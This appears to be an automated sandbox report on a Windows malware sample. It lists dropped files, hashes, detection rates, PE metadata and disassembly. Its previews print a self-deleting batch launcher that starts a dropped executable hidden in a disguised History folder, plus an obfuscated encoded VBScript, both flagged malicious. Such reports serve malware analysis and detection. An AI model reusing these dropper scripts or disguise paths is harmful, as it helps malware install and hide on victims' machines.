              SHA-256:AF8A81F4387BA5EBE96F5111D56B65585C194602E5BD147997EAB1B6E28AE7B2
              SHA-512:12C63EDCD1F347B519DA80C814FCF3640294FDBD2482A7BE4DA4D20F8F5D785D2E97F784DF39AD28B317D2DB3CC43D904C5584FC9EEA2C1F1DF01B999362ADF9
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 79%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................`...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:ASCII text, with very long lines (914), with no line terminators
              Category:dropped
              Size (bytes):914
              Entropy (8bit):5.908668874648046
              Encrypted:false
              SSDEEP:24:5C5dK1Rrb8grryABFMiWzuTLWuNpdrXgTG59csZLvF/It+Um:5Cyogb2iW4p9ifsZyts
              MD5:367C51187A4F5FC99B1FEEC32F493437
              SHA1:E83CFE72976D85E786246CA47A8E737D64973C59
              SHA-256:83ADF6D294946F13F467AE9B83550600A661229541DC5DF184997F8BC5C34172
              SHA-512:2F8E48FC17EB92DD5FA8CE2049D593729F4DC47FAC8D6A582BC61CABAE0C88216329BE8921DDF45910DD1801EEBD76D7D4B23E21D0701AE70F8AAC79AC4FAD0C
              Malicious:false
              Preview:uYrGEA3xgQSfwyRFOJURfMZVhuqRWrI7b4Ni9pvzHaIrHmNKbXmlr5Zi8WiUTlazIUE2ksFjXfKEEsN4gg08EhQfepjnGbffASixiUksSDNMvUdPInxxvbvkEiX4Ibc69oEvJZWM5HqBTDtJMUfdortih8t97pj1lRNGQrFsRl1nvuRAzNsy69SR4fOLqWOQhzZC0m3eOwLCzGxxqsKt7u4m95Mvd4C4WlF6UOKMUOkKxPbyrae7MeSx4xD4aIAUtRqOA1dci8ZsKuyteXDDZFs1SSBgLQvMOQafjNy07CYNFjmJ8TaCE64oiy5rz6QSMNe3USKQjMGWqfwtq2h1zsHRVw7vSGBAwGA1FszqJJd20i7DBMB7ZYceFNiiVY8cLGkje4n7C1spPPaxy3uGFEkYogv1KRUvLBqu8YjGiE4hqwP0wuuco2XHfL47Iwwvh7eNiqzZTnhBJCs2R5Fag1GTnjOwdl7vRIAsRBRF5UIAUV7cdCqNrWOp0Kk9cC6sqvtBC9kPn9eMtG9RlwSb4tE53V2GbRn2YaUim5aebajr1C5uLSXpuex6rxIqHdyWVlyTvbppWx9eKXD1aH5J37I3mX1zxtX8mNVPNm8umsT6fTwTtRQAipcXd4qYj02maB26BxnxIKgLoMYTlhFgdXZ6v7wS5kKw0rfdazS5oc1XIQtRgWxCuVIDl5LEBU2iAtV7q43vPJ2BfBxeOfwjwHBeic1foN4UjSXZ4vkldCxldHhjIqzfhSv2r1ZODYHBPibMoYjc5KFuUaBb4RW7XZwRgfrDWViF4vW4pU5tGXjWMBhQz8UvBJnzwKpIqgFjmAziEGvjWn0AzZEf8aOYBwEuIgIfowCkRAuML8LsMuZXSnAWGKKQSrhz6Eai8P5jkQsyo2U9OfLRXqcffv
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:ASCII text, with very long lines (566), with no line terminators
              Category:dropped
              Size (bytes):566
              Entropy (8bit):5.88232739066755
              Encrypted:false
              SSDEEP:12:EDCfzsdjCrUbTRkNHNNlqPyCL/6uBxeUrGez2u7g:Emo1FTOBl4/6uBxeUrHSu7g
              MD5:2598EF8257908DC8B687EC93C554C83A
              SHA1:FA116964C6EA857F01EC4284BC07527985D7AA82
              SHA-256:A8E5FAF18DCA56B3FB5DF7DDB6DE17617619F2FE5AC54E85D611A0B80CB7CBF1
              SHA-512:650F4390EADC5972F17BA7FFBC75500BD72F329E86848201FBBEAC83993FA8646AC758A724FA35C170F2055D0D6FF227DB3DFDEA8224FFD483236E959DE68505
              Malicious:false
              Preview:1jMpsw2gmNM9UoHbCqZOF4aVNhF6zlwKPINkG7MAKeU64CCExJ8qr8d6J1cKr5rAbBtLbhVFdZDlkdbLfBJpnFdQpQbPeBSOxTf2S0nQy3MS42WpaRpqwBXVidgKFFkbGzyQ8i2pX21u3KVx4wyNWmcv6KTzUcKsSuLFEFq1Y9S3JnbXHsPTRWFeWCTyODV5sJbI9PtzF6zWTjmTs5rlM0a6prtBv2mUoXKALSY19aOUhsKxZAFTVts1sfdRgrDMTer6YlHZh0lvmGY7h6lvxT85oSRqzHUSXCACANYy2qvfI6PmGgukFRY9fwSFUbkafTYjFW6Uhx3HidwrDpkSWuMFnBhN5TdaFVAyiqgukaDRYRbC9kCo0RDuGS6EzsZNTcBMc8JWI0s6r4rVjeNUQzkySQrPtc51Bz85QPkBbpf9iGDMlkeUfE7e2N3MQ3nq51526vFU4L2lUkPLMfoJ8kV62dDCVXviCzErLLPzeKaTMVJS8r9uPdsVf89csD8gaUiffhABPyoxKCugUvEnYBTiHtLMLwHbM331xowaq8eaz4KdOdI78U
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):847872
              Entropy (8bit):6.079346881696685
              Encrypted:false
              SSDEEP:12288:D0OPXYnImrdBcepsmMLWpFMKZsNqBOAROfIJZ0S/J:DI7rd5XFM2cxARnZ0S/J
              MD5:F6B809FA6BD0E72435FAB78E9744CCD7
              SHA1:52749158484CF20A6511FCD36FDA0E8100EBE316
              SHA-256:AF8A81F4387BA5EBE96F5111D56B65585C194602E5BD147997EAB1B6E28AE7B2
              SHA-512:12C63EDCD1F347B519DA80C814FCF3640294FDBD2482A7BE4DA4D20F8F5D785D2E97F784DF39AD28B317D2DB3CC43D904C5584FC9EEA2C1F1DF01B999362ADF9
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 79%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................`...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):847872
              Entropy (8bit):6.079346881696685
              Encrypted:false
              SSDEEP:12288:D0OPXYnImrdBcepsmMLWpFMKZsNqBOAROfIJZ0S/J:DI7rd5XFM2cxARnZ0S/J
              MD5:F6B809FA6BD0E72435FAB78E9744CCD7
              SHA1:52749158484CF20A6511FCD36FDA0E8100EBE316
              SHA-256:AF8A81F4387BA5EBE96F5111D56B65585C194602E5BD147997EAB1B6E28AE7B2
              SHA-512:12C63EDCD1F347B519DA80C814FCF3640294FDBD2482A7BE4DA4D20F8F5D785D2E97F784DF39AD28B317D2DB3CC43D904C5584FC9EEA2C1F1DF01B999362ADF9
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 79%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................`...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:ASCII text, with very long lines (818), with no line terminators
              Category:dropped
              Size (bytes):818
              Entropy (8bit):5.903646347789358
              Encrypted:false
              SSDEEP:24:HBeVyz2oxY6MY0LlBOZputrPravXf38fIqy5pqVv:HBAY6JlPQ38fIqycv
              MD5:DDC05FF815904435579C25908433159B
              SHA1:7E5E9A6B91B30CB9B348331E00B1159AC1FB7DF5
              SHA-256:854052CC2CAAFCD1CB903B45E79CC27591F7ED5A6BBFFB94D9A64814AEFA7939
              SHA-512:A43A694030F713DFF9461912ED2B59CAC5BB40BB42ECFCA0B82EFC3BEAEA2D8ED601DB63F9A6A31324A54C3BEC0F33B7AA6ADCB5D77A47CEF57E68E2DC1A2D67
              Malicious:false
              Preview:5YeJ9GWH7CbkguSceSVV4YN3nn5bpTDBrb82V0yOVHMdwxqVZem7AV4gLlgWK5bn8a2EwZHneG9wMtGz6jBKqGBVhbqtUbDZpifW4mi9X8d3WHUbfqZl3Q61YhhVtXTCCjGnOt4UACxsnH8ZGOOnBcfYln7XFNPApa0wBqNvwFk1dOORiHOeIpAkDrCkvhPwwwCMQMYZAd162o5WZpy79v19aQsTon9PzxErLBBWtydpyDsYwqKFsRxB5Dw9dFvXdmGEkNKYocOLRLKWiUg7c3hhADvIOC3nCGMM6nyifwbPDmtu2ZaJjx5jFjEgcCJmjkIL98Z5f7cpbReXTBPyltEOKmHXiRGcmzqcehv4AfnmVPHxEqNbxUAzg3AW1BWN09DmlB3wQUyFFc35eTT1EppSy06kgYD8JavVMfMDxaLcf5tE9F2hseILUuxuFTP1R06prit8GPEneMw3H2kbgfPoRjAbsc8eLTLp8DWbV3bdZfrI83nMsxVvlRYHhSQoRkcKBH4DfJFnEwOw22cyzvvX8ZErpP4DmwLzDgG19jrisrryCmPozcygyEMlDNXQPCARkZsVvlzPEMpQrPoDAPOK8pA8UfxvMbTqraOn342NmjclZ63yiUP9x0T5YuBQxDDm39iRBBJFWAhYNZjXl9M1LU20GSOJ2lZjgzsaXlwhKKnxS4s9Knpx0LbjGrLswANuk82YqJ99NpqBqEiLjO8P6lsVXJTpaEvK62MUCUTBnqkLea2BJ9IhB7y8PhAhzUiI4gEy2OJP57lPBh06RRgb5NJ9DNEfTvLTHbR8WDJ503mDWi
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):847872
              Entropy (8bit):6.079346881696685
              Encrypted:false
              SSDEEP:12288:D0OPXYnImrdBcepsmMLWpFMKZsNqBOAROfIJZ0S/J:DI7rd5XFM2cxARnZ0S/J
              MD5:F6B809FA6BD0E72435FAB78E9744CCD7
              SHA1:52749158484CF20A6511FCD36FDA0E8100EBE316
              SHA-256:AF8A81F4387BA5EBE96F5111D56B65585C194602E5BD147997EAB1B6E28AE7B2
              SHA-512:12C63EDCD1F347B519DA80C814FCF3640294FDBD2482A7BE4DA4D20F8F5D785D2E97F784DF39AD28B317D2DB3CC43D904C5584FC9EEA2C1F1DF01B999362ADF9
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 79%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................`...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:CSV text
              Category:dropped
              Size (bytes):1740
              Entropy (8bit):5.36827240602657
              Encrypted:false
              SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
              MD5:B28E0CCD25623D173B2EB29F3A99B9DD
              SHA1:070E4C4A7F903505259E41AFDF7873C31F90D591
              SHA-256:3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
              SHA-512:17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
              Malicious:false
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
              Process:C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe
              File Type:CSV text
              Category:dropped
              Size (bytes):1281
              Entropy (8bit):5.370111951859942
              Encrypted:false
              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
              MD5:12C61586CD59AA6F2A21DF30501F71BD
              SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
              SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
              SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
              Malicious:false
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
              Process:C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exe
              File Type:CSV text
              Category:dropped
              Size (bytes):1281
              Entropy (8bit):5.370111951859942
              Encrypted:false
              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
              MD5:12C61586CD59AA6F2A21DF30501F71BD
              SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
              SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
              SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
              Malicious:false
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):25
              Entropy (8bit):4.1834651896016455
              Encrypted:false
              SSDEEP:3:6+MEAc1D:NMQ
              MD5:D585A0DEC592309CEF7D6321B02A0C65
              SHA1:DC8516CCA0F073EE81446F06A47AD016BFAC72D1
              SHA-256:0677D889E3C48613ABA718497AE51F9994DE7EF1E32975F2E10AD4AAC9EB9265
              SHA-512:2306FC7E87633CB48AD48916D309DD339196E2558EB341F7CF78A20BE9359053EBB689F8ACD84FC1245CAB29D9DB5E674DC7607DB54AD20E94940C69EDE3D0E5
              Malicious:false
              Preview:Kn6JvRIjP2kNIlkCkFmePVyPf
              Process:C:\blockrefSessionBrokerDll\chainMonitor.exe
              File Type:DOS batch file, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):243
              Entropy (8bit):5.026693025606782
              Encrypted:false
              SSDEEP:6:hITg3Nou11r+DE1WD5J23k6dkZKNKOZG1wkn23f1kjPn:OTg9YDEoMUhZ2f6n
              MD5:E7D09EE311D7CCF2EC8A6951581F7CBA
              SHA1:E1B2332395AFEDA14BD8E9B7E659DAE811FDDC72
              SHA-256:3F91A8D214396DFEBD584D0EA94E5AB1582FD5769E182B9F820EFD44911DD08C
              SHA-512:9D4B4B822CB176D4F905CC7E8B534C52FF6C98E28A333EC10985A94970EF3251BF8E7D4469CACF3E9562DCA0469A8D873143783169E48241C4ED1FEE1D286B43
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\nfAOklRSeu.bat"
              Process:C:\Users\user\Desktop\c62q1qZ8kX.exe
              File Type:data
              Category:dropped
              Size (bytes):229
              Entropy (8bit):5.8208040513409705
              Encrypted:false
              SSDEEP:6:GbvwqK+NkLzWbHhE18nZNDd3RL1wQJRXu8OdnojlztHhbWwVs:GKMCzWLy14d3XBJYihzBNWwK
              MD5:7533C94864B144AA157DBD00F03E9871
              SHA1:807BAD6D8CB143E2FAC7EC32A6E07A4016AF308D
              SHA-256:1DCEABAD90F9B4E74E59D62EEBBC86662708D2C28761074E8B4FD73AA73F60AA
              SHA-512:3D536E931DADB7D6EFC079FC9FF336EE4F2C7A291FCD1DF7139C565E74D73E4C12745B886DBB746F060CD46C36CB3D774BC2B9F3A5407A737CB94AC44ED70F8C
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              Preview:#@~^zAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v%T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ4sKm0D+6?.d/bWUAMWVnMfV^&Lgkqg\^b;0aMWE[5:C*qXtwj.P8wR4COr~~!B~6lsk+CUIAAA==^#~@.
              Process:C:\Users\user\Desktop\c62q1qZ8kX.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):847872
              Entropy (8bit):6.079346881696685
              Encrypted:false
              SSDEEP:12288:D0OPXYnImrdBcepsmMLWpFMKZsNqBOAROfIJZ0S/J:DI7rd5XFM2cxARnZ0S/J
              MD5:F6B809FA6BD0E72435FAB78E9744CCD7
              SHA1:52749158484CF20A6511FCD36FDA0E8100EBE316
              SHA-256:AF8A81F4387BA5EBE96F5111D56B65585C194602E5BD147997EAB1B6E28AE7B2
              SHA-512:12C63EDCD1F347B519DA80C814FCF3640294FDBD2482A7BE4DA4D20F8F5D785D2E97F784DF39AD28B317D2DB3CC43D904C5584FC9EEA2C1F1DF01B999362ADF9
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 79%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................`...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\Desktop\c62q1qZ8kX.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):46
              Entropy (8bit):4.3173892722447516
              Encrypted:false
              SSDEEP:3:I5pKulLLFAxJ3GL0s4i:IpFyZGL0Li
              MD5:6F0B3744C91BC8641C6CEF0AE9BE66B5
              SHA1:5E45AEF1422D839F27A9E73B395C58EEAB7AE476
              SHA-256:6442DE1CDF0BF9500DE8B74C00506A7D84193B3780F9242F55497335526AAD5C
              SHA-512:97089E966A4969391AA2FA10D0693C103A16EEA70BFBC01481ECDA46AE6953E3A25ABF3034500E275CC60E0E8DE6F95435B2BA2C9DF2CDA5BF58685AF4CBA8E0
              Malicious:false
              Preview:"C:\blockrefSessionBrokerDll\chainMonitor.exe"
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.371970204419641
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              • Win32 Executable (generic) a (10002005/4) 49.97%
              • Generic Win/DOS Executable (2004/3) 0.01%
              • DOS Executable Generic (2002/1) 0.01%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:c62q1qZ8kX.exe
              File size:1'164'947 bytes
              MD5:11da048860021b6c22e171032e48b023
              SHA1:b3b636a8bd17223454b4522fdbdb4863e0c4a565
              SHA256:c0d51cad38cd578ac0f62737185d0e15184843b8a118bb978d11d9e86998eef3
              SHA512:09b8bc3f1fa034d28a14e0fc5e44722ee84cfd9b32dc7887674100d967b3c9232d7ae42156c8d45050ea781ba87a3ee29a54bfc04bef98c6e5f6d9123444509f
              SSDEEP:24576:U2G/nvxW3Ww0tpI7rd5XFM2cxARnZ0S/J1:UbA30pILXZjv
              TLSH:25454A057E48CE12F0181637C2FF450847B4AC516AA6E72B7EBA376E55123A37C1DACB
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
              Icon Hash:1515d4d4442f2d2d
              Entrypoint:0x41ec40
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
              Instruction
              call 00007F1B3CB1E6B9h
              jmp 00007F1B3CB1E0CDh
              cmp ecx, dword ptr [0043E668h]
              jne 00007F1B3CB1E245h
              ret
              jmp 00007F1B3CB1E83Eh
              int3
              int3
              int3
              int3
              int3
              push ebp
              mov ebp, esp
              push esi
              push dword ptr [ebp+08h]
              mov esi, ecx
              call 00007F1B3CB10FD7h
              mov dword ptr [esi], 00435580h
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              and dword ptr [ecx+04h], 00000000h
              mov eax, ecx
              and dword ptr [ecx+08h], 00000000h
              mov dword ptr [ecx+04h], 00435588h
              mov dword ptr [ecx], 00435580h
              ret
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              lea eax, dword ptr [ecx+04h]
              mov dword ptr [ecx], 00435568h
              push eax
              call 00007F1B3CB213DDh
              pop ecx
              ret
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007F1B3CB10F6Eh
              push 0043B704h
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007F1B3CB20AF2h
              int3
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007F1B3CB1E1E4h
              push 0043B91Ch
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007F1B3CB20AD5h
              int3
              jmp 00007F1B3CB22B23h
              jmp dword ptr [00433260h]
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              push 00421EB0h
              push dword ptr fs:[00000000h]
              Programming Language:
              • [ C ] VS2008 SP1 build 30729
              • [IMP] VS2008 SP1 build 30729
              • [C++] VS2015 UPD3.1 build 24215
              • [EXP] VS2015 UPD3.1 build 24215
              • [RES] VS2015 UPD3 build 24213
              • [LNK] VS2015 UPD3.1 build 24215
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
              IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000xdfd0.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x2268.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x310ea0x31200c5bf61bbedb6ad471e9dc6266398e965False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x330000xa6120xa8007980b588d5b28128a2f3c36cabe2ce98False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x3e0000x237280x1000201530c9e56f172adf2473053298d48fFalse0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .didat0x620000x1880x200c5d41d8f254f69e567595ab94266cfdcFalse0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x630000xdfd00xe000f6c0f34fae6331b50a7ad2efc4bfefdbFalse0.6370326450892857data6.6367506404157535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x710000x22680x2400c7a942b723cb29d9c02f7c611b544b50False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountryZLIB Complexity
              PNG0x636500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
              PNG0x641980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
              RT_ICON0x657480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
              RT_ICON0x65cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
              RT_ICON0x665580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
              RT_ICON0x674000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
              RT_ICON0x678680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
